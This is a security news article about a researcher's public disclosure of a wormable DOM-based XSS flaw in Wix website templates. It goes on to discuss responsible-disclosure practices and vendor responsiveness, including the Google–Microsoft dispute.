A cross-site scripting vulnerability on a single website can divert unsuspecting users to malicious sites. When that same vulnerability exists across millions of websites, a worm can hop from site to site and compromise even more users.
Now, a worm can exploit the XSS flaw on website building platform Wix.com on the scale of the infamous MySpace worm, researchers from Contrast Security warned.
[ Roger Grimes’ free and almost foolproof way to check for malware. | Discover how to secure your systems with InfoWorld’s Security Report newsletter. ]
“If the MySpace worm is any guide, taking over all the millions of websites hosted at Wix wouldn’t take very long,” Contrast Security researcher Matt Austin said in his disclosure.
Traditional cross-site scripting attacks drop a payload onto a page in response to an HTTP/HTTPS request. DOM-based XSS, on the other hand, modifies the Document Object Model environment in the browser used by client-side scripts, and the malicious code affects code execution.
The severe DOM XSS vulnerability would allow an attacker “complete control” over any Wix-hosted website, Austin said. Since the XSS flaw is in Wix templates, it won’t matter if the site is a subdomain under Wix.com or a custom domain.
The flaw lets attackers perform a broad range of actions, including unleashing a worm capable of infecting every site on the platform. The attacker would have to start off with a Wix website with the DOM XSS in an iframe and spread the URL around to get another Wix site owner to visit the malicious site. The worm would then exploit the XSS flaw in editor.wix.com to edit the site owner’s pages and inject the DOM XSS in another iframe. Any logged-in Wix users visiting that compromised site would become infected and add that iframe to their own pages.
In this case, the vulnerability was in the function for getting a URL parameter. The parameter was stored in a configuration object, and if the user provided a new ReactSource token in the URL, it would override the default location.
“Administrator control of a Wix.com site could be used to widely distribute malware, create a dynamic, distributed, browser-based botnet, mine cryptocurrency, and otherwise generally control the content of the site as well as the users who use it,” Austin wrote.
Austin claimed he repeatedly tried to contact Wix to get the vulnerability fixed, but despite creating a support ticket and directly emailing [email protected], never received a response. When he emailed secur[email protected] with details of the flaw, he received an automated reply stating that [email protected] “may not exist, or you may not have permission to post messages to the group.” Austin decided to publicly disclose the flaw because it could be exploited by a worm.
The debate between private and public disclosure is never-ending, and it usually boils down to the organization’s responsiveness. It appears Wix quietly closed the vulnerability after Austin’s public disclosure since the proof of concept no longer works, which indicates Wix could have responded and fixed the issue swiftly and avoided Austin going public in the first place.
While it would be nice if every company had a bug bounty program or a recognized process for reporting and fixing bugs, at the very least, every organization should have a method to receive security reports. That could be as straightforward as a dedicated [email protected] email address.
Simply having the address isn’t enough though, since someone has to regularly check that address and triage reports. Responding to the researcher with information about what has been done, such as “assigned to a developer to investigate,” and offering updates would keep the researcher informed. Another step is to have a dedicated path within customer support so that tickets for security issues could be assigned and escalated appropriately instead of leaving them to languish in the pool of all tickets.
The other tricky detail about disclosure is figuring out how long is long enough to wait. Austin waited 18 days for Wix to respond before he went public. Researchers Charlie Miller and Chris Valasek worked with Chrysler for months before publicizing the software vulnerability in the automaker’s Uconnect dashboard computers. While waiting 30 or even 60 days is fairly common, there have been times when researchers released the information sooner. This past month, Google publicized a local escalation privilege flaw in Windows 10 days after notifying Microsoft because it was being exploited in the wild.
Microsoft didn’t think the vulnerability merited an emergency patch because the attackers were part of a “low-volume spear-phishing campaign” against a limited number of users. The majority of Windows users were not at risk. Should Google have waited for Microsoft? Should Microsoft have given the flaw higher priority?
“I think it’s not a question of days, but rather of efficient cooperation to fix the vulnerability,” said Ilia Kolochenko, CEO of web security firm High-Tech Bridge. “Instead of endless discussions about the ethics of full disclosure, we should rather concentrate on inter-corporate coordination, cooperation, and support to make the internet safer.”
Disclosure is a two-way street. Researchers provide detailed reports, but organizations have to meet them halfway by making it possible to submit those reports and updating the researcher about what is happening with the report. Better communication might not stop another Google-Microsoft disagreement on how to prioritize bugs, but it could stop a company from being called out for not fixing a wormable flaw.